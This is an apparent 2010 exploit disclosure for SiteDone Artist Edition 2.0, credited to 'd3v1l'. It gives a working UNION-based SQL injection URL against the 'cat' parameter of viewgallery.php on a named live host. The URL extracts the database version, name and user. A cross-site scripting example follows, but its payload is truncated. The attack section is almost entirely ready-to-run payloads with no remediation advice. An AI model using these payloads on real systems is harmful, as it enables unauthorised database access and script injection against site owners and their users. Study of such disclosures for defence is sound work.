[~] SiteDone Artist Edition 2.0 SQL Injection & XSS Vulnerability [~] [~] http://www.sitedone.com [~] [~] [~] ----------------------------------------------------------------------------------------------- [~] Bug founded by d3v1l [Avram Marius] [~] [~] Date: 18.03.2010 [~] [~] [~] http://security-sh3ll.blogspot.com [~] [~] ------------------------------------------------------------------------------------------------ [~] viewgallery.php?type=&cat=SQL & XSS [~] [~] [~] Ex :- [~] [~] http://angelcity.sitedone.com/site/gallery/viewgallery.php?type=&cat=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11-- [~] http://angelcity.sitedone.com/site/gallery/viewgallery.php?type=&cat="> [~]-------------------------------------------------------------------------------------------------